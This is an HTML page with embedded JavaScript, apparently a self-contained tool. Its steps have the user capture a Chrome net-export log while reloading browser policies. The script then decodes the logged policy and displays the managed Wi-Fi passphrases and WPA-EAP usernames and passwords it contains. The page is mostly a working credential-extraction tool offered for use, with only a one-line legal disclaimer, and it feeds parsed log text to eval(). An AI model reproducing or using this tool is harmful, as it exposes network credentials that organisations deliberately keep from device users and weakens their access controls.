<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<title>Network Policy Password Extractor tool</title>
<link href="./prism.css" rel="stylesheet" />
<style>
td,
th {
border: 1px solid #000;
}
#log {
font-family: "Courier"
}
* {
background-color: black;
color: rgb(196, 196, 196);
font-family: monospace;
}
input,button {
background-color: #131313;
border:#0a0a0a ;
border-width: 3px;
border-radius: 3px;
border-style:solid;
margin: 1.4px;
cursor: pointer;
}
* {
background-color: black;
color: rgb(196, 196, 196);
font-family: monospace;
}
input,button {
background-color: #131313;
border:#0a0a0a ;
border-width: 3px;
border-radius: 3px;
border-style:solid;
margin: 1.4px;
cursor: pointer;
}
</style>
</head>
<body>
<p>
<h1>Policy Password tool</h1>
<p>
<i>This tool should not be used for illegal activity. By using this tool, you acknowledge that you are legally allowed to extract the password(s) in question.</i>
<br />
<br />
<b>Upload chrome-net-export-log.json - </b>
<input type="file" id="export" />
<br />
<table id="output-networks">
<tr>
<th>SSID</th>
<th>Credentials</th>
<th>Security</th>
<th>HiddenSSID</th>
</tr>
</table>
<h2>How to use</h2> - Visit chrome://net-export <br /> - In "OPTIONS" set "Include raw bytes" <br /> - Click "Start Logging to Disk" <br /> - Visit chrome://policy <br /> - Click "Reload policies" <br /> - Go back to chrome://net-export and click "Stop logging" <br /> - Upload file here :) </p>
</p>
<div id="log">
</div>
<br />
<br />
<br /><br />
<script>
let log = (txt) => {
console.log(txt);
document.getElementById("log").innerText += txt + "\n"
}
let extract = (event) => {
let file = event.target.files[0];
let reader = new FileReader();
reader.readAsText(file);
reader.onload = (e) => {
let netlog = e.target.result;
let split_netlog = netlog.split("\n");
let policyNets = [];
for (let i = 0; i < split_netlog.length; i++) { // Find the line where the policy was returned. These encodes are fragments of the string "NetworkConfiguration".
if (split_netlog[i].includes("ya0NvbmZpZ3VyYXRpb2") || split_netlog[i].includes("vcmtDb25maWd1cmF0aW") || split_netlog[i].includes("rQ29uZmlndXJhdGlvbn") || split_netlog[i].includes("Db25maWd1cmF0aW9ucw")) {
log(i);
policyNets.push(split_netlog[i]);
}
}
policyNets.forEach(policyNet => {
try {
policyNet = atob(policyNet.substring((policyNet.indexOf('"bytes":"') + 9), (policyNet.indexOf('"},"phase"'))));
log(policyNet);
let NetworkConfigurations = policyNet.substring(policyNet.indexOf('"NetworkConfigurations":'), policyNet.indexOf("]\n}b")) + "]";
NetworkConfigurations = NetworkConfigurations.substring(0, NetworkConfigurations.search(/}\n *]/));
NetworkConfigurations = NetworkConfigurations.replace(/("NetworkConfigurations":|\n)/g, "") + "}]";
log(NetworkConfigurations);
eval("NetworkConfigurations = " + NetworkConfigurations);
for (wifi in NetworkConfigurations) {
log(NetworkConfigurations[wifi]);
let tr = document.createElement("tr");
let SSID = document.createElement("td");
SSID.innerText = NetworkConfigurations[wifi]["WiFi"]["SSID"];
let Security = document.createElement("td");
Security.innerText = NetworkConfigurations[wifi]["WiFi"]["Security"];
let Passphrase = document.createElement("td");
if (NetworkConfigurations[wifi]["WiFi"]["Passphrase"]) {
Passphrase.innerText = NetworkConfigurations[wifi]["WiFi"]["Passphrase"]
} else if (Security.innerText == "WPA-EAP" && NetworkConfigurations[wifi]["WiFi"]["EAP"]["Password"]) {
Passphrase.innerText = "Identity: " + NetworkConfigurations[wifi]["WiFi"]["EAP"]["Identity"] + "\nPassword: " + NetworkConfigurations[wifi]["WiFi"]["EAP"]["Password"];
} else Passphrase.innerText = "NOT FOUND";
let HiddenSSID = document.createElement("td");
HiddenSSID.innerText = NetworkConfigurations[wifi]["WiFi"]["HiddenSSID"];
tr.appendChild(SSID);
tr.appendChild(Passphrase);
tr.appendChild(Security);
tr.appendChild(HiddenSSID);
document.getElementById("output-networks").appendChild(tr);
}
} catch (err) {
log(err)
}
})
}
}
document.getElementById("export").addEventListener("change", extract)
</script>
</body>
</html>